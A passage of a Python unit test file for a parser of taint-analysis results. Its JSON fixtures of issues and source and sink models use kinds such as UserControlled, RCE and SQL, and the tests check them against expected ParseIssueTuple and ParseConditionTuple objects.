line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.other_source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
ParseIssueConditionTuple(
callee="foo.other_sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={("_user_controlled", "UserControlled", 1)},
final_sinks={("_remote_code_execution", "RCE", 2)},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source with multiple kinds to indirect sinks with multiple kinds.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled, Header] to [RCE, SQL]",
"traces": [
{
"name": "forward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 14,
"start": 15,
"end": 16
},
"resolves_to": ["foo.source"],
"port": "result"
},
"tito": [ { "line": 17, "start": 18, "end": 19 } ],
"kinds": [
{
"kind": "UserControlled",
"length": 1,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "source-feature" } ]
},
{
"kind": "Header",
"length": 2,
"leaves": [ { "name": "_header" } ],
"features": [ { "always-via": "source-other-feature" } ]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"resolves_to": ["foo.sink"],
"port": "formal(x)[parameter]"
},
"tito": [ { "line": 23, "start": 24, "end": 25 } ],
"kinds": [
{
"kind": "RCE",
"length": 3,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "sink-feature" } ]
},
{
"kind": "SQL",
"length": 2,
"leaves": [ { "name": "_sql" } ],
"features": [ { "always-via": "sink-other-feature" } ]
}
]
}
]
}
],
"features": [
{ "always-via": "foo" },
{ "via": "bar" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled, Header] to [RCE, SQL]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="foo.source",
port="result",
location=SourceLocation(
line_no=14,
begin_column=16,
end_column=16,
),
leaves=[("UserControlled", 1), ("Header", 2)],
titos=[
SourceLocation(
line_no=17, begin_column=19, end_column=19
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="foo.sink",
port="formal(x)[parameter]",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("RCE", 3), ("SQL", 2)],
titos=[
SourceLocation(
line_no=23, begin_column=25, end_column=25
)
],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={
("_user_controlled", "UserControlled", 1),
("_header", "Header", 2),
},
final_sinks={
("_remote_code_execution", "RCE", 3),
("_sql", "SQL", 2),
},
features=["always-via:foo", "via:bar"],
fix_info=None,
)
],
)
# Indirect source into a return sink.
self.assertParsed(
version=3,
input="""
{
"kind": "issue",
"data": {
"callable": "foo.bar",
"callable_line": 10,
"code": 1,
"line": 11,
"start": 12,
"end": 13,
"filename": "foo.py",
"message": "[UserControlled] to [RCE]",
"traces": [
{
"name": "forward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 20,
"start": 21,
"end": 22
},
"tito": [ { "line": 30, "start": 31, "end": 32 } ],
"kinds": [
{
"kind": "UserControlled",
"leaves": [ { "name": "_user_controlled" } ],
"features": [
{ "has": "first-index" },
{ "first-index": "payload" },
{ "always-via": "tito" }
]
}
]
}
]
},
{
"name": "backward",
"roots": [
{
"root": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"kinds": [ { "kind": "RCE" } ]
}
]
}
],
"features": [
{ "has": "first-index" },
{ "first-index": "payload" },
{ "always-via": "tito" }
]
}
}
""",
expected=[
ParseIssueTuple(
code=1,
message="[UserControlled] to [RCE]",
callable="foo.bar",
handle="foo.bar:1|12|13:1:4f2c49226090f13a",
filename="foo.py",
callable_line=10,
line=11,
start=12,
end=13,
postconditions=[
ParseIssueConditionTuple(
callee="_user_controlled",
port="source",
location=SourceLocation(
line_no=20,
begin_column=22,
end_column=22,
),
leaves=[("UserControlled", 0)],
titos=[
SourceLocation(
line_no=30, begin_column=32, end_column=32
),
],
features=[],
type_interval=None,
annotations=[],
),
],
preconditions=[
ParseIssueConditionTuple(
callee="leaf",
port="sink",
location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
leaves=[("RCE", 0)],
titos=[],
features=[],
type_interval=None,
annotations=[],
),
],
initial_sources={("_user_controlled", "UserControlled", 0)},
# pyre-fixme[6]: Expected `str` but got `None`
final_sinks={(None, "RCE", 0)},
features=[
"has:first-index",
"first-index:payload",
"always-via:tito",
],
fix_info=None,
)
],
)
def testSourceModelV2(self) -> None:
# User-declared source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"decl": null,
"leaves": [ { "kind": "UserControlled" } ],
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
}
""",
expected=[],
)
# Direct source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" },
{ "kind": "Header", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0), ("Header", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Direct source with multiple leaves.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result[attribute]",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" },
{ "kind": "UserControlled", "name": "_other_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result[attribute]",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_other_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result[attribute]",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Direct source with ports on leaves (e.g, cross-repo),
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{
"kind": "UserControlled",
"name": "_user_controlled"
},
{
"kind": "UserControlled",
"name": "_cross_repo",
"port": "producer:1:result"
},
{
"kind": "Header",
"name": "_cross_repo",
"port": "producer:1:result"
},
{
"kind": "UserControlled",
"name": "_cross_repo_other",
"port": "producer:1:result"
},
{
"kind": "UserControlled",
"name": "_cross_repo",
"port": "producer:2:result"
}
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0), ("Header", 0)],
caller_port="result",
callee_port="producer:1:result",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo_other",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="producer:1:result",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="producer:2:result",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Indirect source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result[field]",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.source"
],
"port": "result[attribute]",
"length": 2
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" },
{ "kind": "Header", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2), ("Header", 2)],
caller_port="result[field]",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Indirect source with multiple callees.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.source",
"foo.other_source"
],
"port": "result[attribute]",
"length": 2
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.other_source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Mix of direct and indirect sources.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"resolves_to": [
"foo.source"
],
"port": "result[attribute]",
"length": 2
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"leaves": [
{ "kind": "UserControlled", "name": "_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
filename="foo.py",
titos=[
SourceLocation(line_no=110, begin_column=112, end_column=112),
SourceLocation(line_no=113, begin_column=115, end_column=115),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# User-declared parameter source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "formal(x)",
"taint": [
{
"decl": null,
"leaves": [ { "kind": "UserControlled" } ],
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
}
""",
expected=[],
)
# Implicit source.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"leaves": [ { "kind": "UserControlled" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="leaf",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
],
)
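# The v3 format groups leaves under a per-frame "kinds" list, with "leaves",
# "features" and "length" attached to each kind, plus frame-level
# "local_features" that surface as ParseTraceFeature entries on the result.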
def testSourceModelV3(self) -> None:
# User-declared source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "UserControlled",
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
]
}
}
""",
expected=[],
)
# Direct source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"local_features": [ { "always-via": "source-local" } ],
"kinds": [
{
"kind": "UserControlled",
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
},
{
"kind": "Header",
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "other-direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0), ("Header", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[ParseTraceFeature("always-via:source-local", [])],
annotations=[],
)
],
)
# Direct source with multiple leaves.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result[attribute]",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"leaves": [
{ "name": "_user_controlled" },
{ "name": "_other_user_controlled" }
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result[attribute]",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_other_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result[attribute]",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Direct source with ports on leaves (e.g., cross-repo).
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"leaves": [
{
"name": "_user_controlled"
},
{
"name": "_cross_repo",
"port": "producer:1:result"
},
{
"name": "_cross_repo_other",
"port": "producer:1:result"
},
{
"name": "_cross_repo",
"port": "producer:2:result"
}
],
"features": [ { "always-via": "direct-source" } ]
},
{
"kind": "Header",
"leaves": [
{
"kind": "Header",
"name": "_cross_repo",
"port": "producer:1:result"
}
],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0), ("Header", 0)],
caller_port="result",
callee_port="producer:1:result",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo_other",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="producer:1:result",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="producer:2:result",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Indirect source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result[field]",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.source"
],
"port": "result[attribute]"
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"length": 2,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
},
{
"kind": "Header",
"length": 3,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2), ("Header", 3)],
caller_port="result[field]",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Indirect source with multiple callees.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.source",
"foo.other_source"
],
"port": "result[attribute]"
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"length": 2,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.other_source",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Mix of direct and indirect sources.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "UserControlled",
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
}
]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"resolves_to": [
"foo.source"
],
"port": "result[attribute]"
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"kinds": [
{
"kind": "UserControlled",
"length": 2,
"leaves": [ { "name": "_user_controlled" } ],
"features": [ { "always-via": "direct-source" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="_user_controlled",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="foo.source",
callee_location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
filename="foo.py",
titos=[
SourceLocation(line_no=110, begin_column=112, end_column=112),
SourceLocation(line_no=113, begin_column=115, end_column=115),
],
leaves=[("UserControlled", 2)],
caller_port="result",
callee_port="result[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# User-declared parameter source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "formal(x)",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "UserControlled",
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
]
}
}
""",
expected=[],
)
# Implicit source.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sources": [
{
"port": "result",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"kinds": [ { "kind": "UserControlled" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.POSTCONDITION,
caller="foo.bar",
callee="leaf",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[],
leaves=[("UserControlled", 0)],
caller_port="result",
callee_port="source",
type_interval=None,
features=[],
annotations=[],
),
],
)
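# Sink models mirror the source cases above but are parsed as PRECONDITION
# tuples: the caller port names the tainted formal and the callee port is
# either "sink" or a producer port for cross-repo leaves.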
def testSinkModelV2(self) -> None:
# User-declared sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"decl": null,
"leaves": [ { "kind": "RCE" } ],
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
}
""",
expected=[],
)
# Direct sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "SQL", "name": "_sql" },
{ "kind": "RCE", "name": "_sql" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_sql",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("SQL", 0), ("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Direct sink with multiple leaves.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "RCE", "name": "_remote_code_execution" },
{ "kind": "RCE", "name": "_other_remote_code_execution" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
